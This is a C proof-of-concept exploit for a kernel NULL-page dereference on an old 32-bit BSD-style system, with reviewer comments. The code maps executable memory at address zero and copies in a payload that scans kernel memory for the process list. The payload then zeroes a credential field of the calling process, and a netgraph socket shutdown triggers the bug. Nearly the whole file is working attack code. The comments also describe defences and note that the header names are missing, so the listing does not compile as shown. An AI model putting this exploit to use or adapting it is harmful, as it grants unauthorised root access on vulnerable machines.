/*
 * NOTE(review): the twelve #include directives below lost their header
 * names during extraction (they appear empty here), so this listing does not
 * compile as shown; PAGE_SIZE, uint, struct proc, mmap(), getpid(), socket()
 * and PF_NETGRAPH/NG_DATA all come from those missing headers.
 *
 * Proof-of-concept for a kernel NULL-page dereference on a 32-bit BSD-style
 * kernel (kernel addresses are assumed to lie at 0xc0000000 and above):
 * main() maps page zero, copies the machine code of x() into it, then opens
 * and shuts down a netgraph socket, presumably so the kernel calls through a
 * NULL pointer that page zero now backs. The vulnerable kernel path itself is
 * not on this page.
 *
 * Defender's view: the observable primitive is an unprivileged process
 * mapping address 0 with MAP_FIXED and PROT_EXEC. Refusing such mappings
 * (a minimum-mmap-address policy, e.g. FreeBSD's security.bss.map_at_zero
 * sysctl) and hardware blocking of kernel execution of user pages
 * (SMEP/SMAP-style features) both defeat this class of exploit, and an audit
 * rule on mmap(addr == 0, MAP_FIXED) gives a cheap detection signal.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PAGES 1                 /* number of pages mapped at address 0 */
#define PATTERN1 0x8f8f8f8f     /* declared but not referenced on this page */
#define PATTERN2 0x6e6e6e6e     /* placeholder pid immediate; main() patches it */

typedef unsigned long ulong;
typedef unsigned char uchar;

/*
 * Payload that executes in kernel mode once the kernel jumps to page zero.
 *
 * Stage 1: scan upward from 0xc0000000 one 32-bit word at a time for the word
 * pattern labelled below (three words with the top two bits set, a fixed
 * word, a count word -- four such groups 16 words apart, followed by a
 * kernel-range word and a zero word). The match is taken as the address of
 * the allproc list head. The scan has no upper bound; if the pattern is
 * absent the loop never terminates.
 *
 * Stage 2: walk p_list.le_next until p_pid equals PATTERN2 (main() overwrites
 * that literal with the caller's own pid), then zero the second 32-bit word
 * of that process's p_ucred. Which credential field that word is depends on
 * the target kernel's struct ucred layout, which is not visible here. The
 * walk does not check le_next for NULL before dereferencing it.
 *
 * The body makes no function calls: main() copies its raw bytes only up to
 * the first 0xc3 byte (x86 ret), so any call sequence or stray 0xc3 byte in
 * the compiled body would truncate or break the copy.
 *
 * Return: always 1 (the value is not used by the caller).
 */
int x(void)
{
    struct proc * p = 0x0;
    uint * i;
    uint *base = (uint *)0xc0000000;

    while(1) {
        if (
            /* allproc_lock */
            (*base & 0xc0000000) == 0xc0000000 &&
            (*(base+1) & 0xc0000000) == 0xc0000000 &&
            (*(base+2) & 0xc0000000) == 0xc0000000 &&
            (*(base+3) == 0x003b0000) &&
            (*(base+7) == 0x00000001) &&
            /* proctree_lock */
            (*(base+16) & 0xc0000000) == 0xc0000000 &&
            (*(base+17) & 0xc0000000) == 0xc0000000 &&
            (*(base+18) & 0xc0000000) == 0xc0000000 &&
            (*(base+19) == 0x003b0000) &&
            (*(base+23) == 0x00000001) &&
            /* pargs_ref_lock */
            (*(base+32) & 0xc0000000) == 0xc0000000 &&
            (*(base+33) & 0xc0000000) == 0xc0000000 &&
            (*(base+34) & 0xc0000000) == 0xc0000000 &&
            (*(base+35) == 0x00030000) &&
            (*(base+39) == 0x00000004) &&
            /* ppeers_lock */
            (*(base+48) & 0xc0000000) == 0xc0000000 &&
            (*(base+49) & 0xc0000000) == 0xc0000000 &&
            (*(base+50) & 0xc0000000) == 0xc0000000 &&
            (*(base+51) == 0x00030000) &&
            (*(base+55) == 0x00000004) &&
            /* allproc */
            (*(base+57) & 0xc0000000) == 0xc0000000 &&
            (*(base+58) == 0x0)
        ) {
            /* word 57 of the matched layout is taken as the list head */
            base = base+57;
            break;
        }
        base++;
    }

    p = (struct proc *)base;
    while(1) {
        if(p->p_pid == PATTERN2) {
            /* zero the word at byte offset 4 of the credential struct */
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }
        p = p->p_list.le_next;
    }
    return 1;
}

/*
 * Stages the payload at address 0 and triggers the kernel bug.
 *
 * 1. mmap() PAGES pages at NULL with MAP_FIXED|MAP_ANON and rwx protection.
 *    NOTE(review): on mmap failure this returns 0, reporting success to the
 *    shell even though nothing was done.
 * 2. Copy x()'s bytes into page zero, stopping at the first 0xc3 byte, then
 *    append a 0xc3 so the copy always ends in a ret.
 * 3. Locate the PATTERN2 immediate inside the copied code and overwrite its
 *    four bytes with this process's pid (little-endian) so x() recognises the
 *    caller's own struct proc. The scan compares sizeof(long) bytes at each
 *    unaligned offset against a 32-bit literal; where long is 64 bits the
 *    upper bytes would also have to be zero, so the match may never occur and
 *    the loop would not terminate -- this assumes an i386 build.
 * 4. Open a PF_NETGRAPH datagram socket and shut it down; presumably the
 *    kernel path exercised here dereferences a NULL pointer. That kernel code
 *    is not visible on this page.
 *
 * argc/argv, addr and i are declared but never used.
 * Return: 0 after the trigger and also on mmap failure; 1 if socket() fails.
 */
int main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0);
    if(v == MAP_FAILED) {
        perror("mmap");
        return 0;
    }

    /* byte-copy x() into page zero up to and including its first 0xc3 */
    c = v;
    d = (uchar * )x;
    while(1) {
        *c = *d;
        if(*d == 0xc3) {
            break;
        }
        d++;
        c++;
    }
    *c++ = 0xc3;

    /* patch the PATTERN2 immediate in the copied code with our pid */
    c=v;
    pid = getpid();
    while(1) {
        if(*(long * )c == PATTERN2) {
            *(c + 0) = pid >> 0;
            *(c + 1) = pid >> 8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    /* trigger: open and immediately shut down a netgraph data socket */
    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0) {
        perror("socket");
        return 1;
    }
    shutdown(s, SHUT_RDWR);
    return 0;
}